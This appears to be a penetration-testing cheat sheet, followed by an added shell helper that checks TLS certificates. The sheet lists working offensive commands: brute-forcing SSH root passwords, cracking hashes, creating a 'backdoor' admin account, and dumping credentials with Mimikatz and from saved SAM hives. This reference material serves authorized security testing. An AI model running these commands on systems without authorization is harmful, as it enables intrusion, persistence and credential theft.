Basic Linux Networking Tools
Show IP configuration:
# ip a l
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"
Start TLS Server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem
Connect to TLS service:
# ncat --ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337
Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[…]bd88
Show example hash types for hashcat:
# hashcat --example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt
Windows Privilege Escalation
Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23 /add
C:\> net localgroup Administrators backdoor /add
Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv
Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443
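Added example (not part of the original cheat sheet): a shell helper that turns the certificate details shown by the openssl commands above into findings when reviewing a TLS endpoint's certificate. The function names, finding labels and default thresholds are assumptions of this example; the demo certificate is constructed locally.

```shell
#!/bin/sh
# cert_findings FILE [MIN_BITS] [MIN_DAYS]
# Prints one finding per line for a PEM certificate:
#   SELF_SIGNED    subject and issuer are identical
#   WEAK_KEY:<n>   public key is shorter than MIN_BITS (default 2048)
#   EXPIRES_SOON   certificate expires within MIN_DAYS (default 30)
cert_findings() {
    cert=$1
    min_bits=${2:-2048}
    min_days=${3:-30}

    # Print both names in the same format so they can be compared as strings.
    subject=$(openssl x509 -in "$cert" -noout -subject -nameopt RFC2253 | sed 's/^subject= *//')
    issuer=$(openssl x509 -in "$cert" -noout -issuer -nameopt RFC2253 | sed 's/^issuer= *//')
    if [ "$subject" = "$issuer" ]; then
        echo "SELF_SIGNED"
    fi

    # The text dump contains a line such as "Public-Key: (2048 bit)".
    bits=$(openssl x509 -in "$cert" -noout -text |
        sed -n 's/.*Public-Key: (\([0-9]*\) bit).*/\1/p')
    if [ -n "$bits" ] && [ "$bits" -lt "$min_bits" ]; then
        echo "WEAK_KEY:$bits"
    fi

    # -checkend N exits non-zero when the certificate expires within N seconds.
    if ! openssl x509 -in "$cert" -noout -checkend $((min_days * 86400)) >/dev/null; then
        echo "EXPIRES_SOON"
    fi
    return 0
}

# make_demo_cert OUT.pem DAYS
# Constructed sample input: a throwaway self-signed certificate, created the
# same way as in "Create self-signed certificate" above (key in OUT.pem.key).
make_demo_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days "$2" \
        -subj "/CN=example.org" -keyout "$1.key" -out "$1" 2>/dev/null
}
```

To check a live service, save its certificate first, for example with openssl s_client -connect host:port </dev/null | openssl x509 -out server.pem, then run cert_findings server.pem.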